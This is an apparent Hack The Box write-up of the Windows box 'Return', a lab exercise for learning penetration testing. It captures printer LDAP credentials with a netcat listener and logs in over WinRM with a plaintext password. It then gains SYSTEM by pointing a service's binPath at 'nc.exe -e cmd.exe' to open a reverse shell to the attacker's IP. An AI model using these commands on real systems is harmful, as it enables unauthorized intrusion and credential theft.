Return is an easy Windows box created by MrR3boot on Hack The Box and I’m going to hack it. Hello world, welcome to Haxez where in this post I’m going to explain how I hacked Return. To hack this machine, you will need basic host enumeration knowledge, and basic active directory knowledge.
First, I pinged the target to ensure that it was online and that I could talk to it. Next, I ran a Nmap scan against all ports requesting service versions and running default scripts. Furthermore, I told Nmap to save the results in all formats with the name ‘return’. The services listening on the host suggested it was a domain controller.
┌──(kali㉿kali)-[~/HTB/Return] └─$ sudo nmap -sC -sV -p- 10.129.95.241 -oA return
I also performed a quick UDP scan with a minimum packet rate of 10,000. My justification for doing this was that I suspected SNMP would be listening. While SNMP wasn’t listening, DNS, NTP, and LDAP were.
Initially, I speculated that the domain was ‘return.htb’ and attempted to perform a DNS zone transfer using dig. Unfortunately, I got no results back from the host either because the domain wasn’t ‘return.htb’ or because zone transfers were restricted.
┌──(kali㉿kali)-[~/HTB/Return] └─$ dig axfr return.htb @10.129.95.241 ; <<>> DiG 9.18.12-1-Debian <<>> axfr return.htb @10.129.95.241 ;; global options: +cmd ; Transfer failed.
Next, I visited the web server in my browser which returned a control panel for a printer. While navigating around the control panel I noticed some credentials on the settings page. I was close to guessing the domain (return.local).
LDAP Credential Harvesting
Since the settings page allows us to specify the server address of the LDAP server, I started a netcat listener on port 389. Next, I changed the IP address in the server address form. Since the credentials were likely stored/cached on the host, I hoped that the host would try to authenticate against our netcat listener.
After saving my IP address in the Server Address form, my netcat listener instantly received credentials from the printer. I could use the credentials to enumerate SMB. However, during the Nmap scan, I noticed that port 5985 (Microsoft HTTPAPI) was listening. This should allow me to connect via Evil-WinRM.
As I mentioned previously, port 5985 was open which I connected to using Evil-WinRM. The target authenticated me using the credentials we harvested from the printer. From this foothold, I was able to capture the user flag.
┌──(kali㉿kali)-[~/HTB/Return] └─$ evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!' Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Directory: C:\Users\svc-printer\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 3/28/2023 11:55 PM 34 user.txt *Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt 246▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓93e
Return Authenticated Host Enumeration
First things first, I performed some quick enumeration to ascertain what privileges I had as the ‘svc-printer’ user. Running the ‘net user svc-printer’ command revealed that the user was part of the ‘Printer Operators’, ‘Remote Management Use’, ‘Server Operators’ and ‘Domain Users’ groups.
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> net user svc-printer
Researching each of these groups, I stumbled upon this Learn Microsoft article which has the following to say about the ‘Server Operators’ group.
Members of the Server Operators group can administer domain controllers. This group exists only on domain controllers. By default, the group has no members. Members of the Server Operators group can take the following actions: sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer. This group can’t be renamed, deleted, or removed.
Return Privilege Escalation
The user is allowed to start and stop services which meant I could reconfigure a service and restart it. For that reason, I downloaded the ‘nc.exe’ binary from >>HERE<< and uploaded it to the server. The great thing about Evil-WinRM is that you can upload files. Therefore, using the upload command I uploaded the netcat binary to the server.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload /home/kali/HTB/Return/nc.exe
With the binary uploaded, I used the Evil-WinRM built-in services command to see what services were listening. The image below shows the services and whether or not they have privileges. There were several services that I could abuse but I chose the VGAuthService service.
This is where my lack of experience is on display, I ran the commands in the official walkthrough but kept getting an error. The error suggested it couldn’t find the file. Me being me, I assumed I was typing the service wrong even though I had successfully modified and stopped it. I spent about 10 minutes getting frustrated until I looked back at my commands. I had uploaded the ‘nc.exe’ binary to the desktop directory but the path I was specifying was to the documents directory.
Capturing The root Flag
Let’s go through the commands. First, I ran sc.exe config to change the binary path of the VGAuthService. As you can see from the command below, the path includes the argument being fed to ‘nc.exe’ to start the reverse shell.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VGAuthService binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.36 9001"
Next, I ran the ‘sc.exe stop VGAuthService’ command to stop the service. The service needs to be stopped for the new netcat command to be executed.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VGAuthService
Finally, I restarted the ‘VGAuthService’ using the ‘sc.exe start VGAuthService’ command. However, before doing that I set up a netcat listener on my host listening on the port specified in the binary path. As soon as the service was restarted, I received a connection back to my host.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VGAuthService
The reverse shell was a bit unstable. You can see from the screenshot below that I had to restart the service a couple of times.
The reverse shell connected back to my netcat listener and I was able to grab the root flag and complete the box.
┌──(kali㉿kali)-[~/HTB/Return] └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.36] from (UNKNOWN) [10.129.95.241] 64654 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Users\Administrator\Desktop>type root.txt type root.txt 703▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓959
Return was a great box and would be brilliant for people who are new to the industry. It requires some enumeration but keeps it simple. Once the foothold is established, it requires the use of built-in system commands combined with user-supplied executables to escalate privileges. I’ve made sure to add this privilege escalation technique to my notes.
I learnt a few things from this box. I’ve mostly only ever managed Windows via the GUI so was unfamiliar with the Service Command executable (sc.exe). This is something I definitely should have known by now but in my defence, when needed to I mostly used the ‘net stop’ and ‘net start’ commands. It’s great how boxes like this identify gaps in my knowledge. However, they do make me wonder how I still have a job in this industry.
Admittedly, I used to fear and dislike Windows boxes but I’ve come to prefer them over Linux. That isn’t to say I don’t love Linux boxes, there are just more of them so when I do play with a Windows box, it’s a treat. Anyway, back to what I was saying. With Windows boxes, I struggled with basic enumeration and how to connect to the host when RDP wasn’t available. Now, I’m a lot more comfortable so they are much more fun. Anyway, sc you later.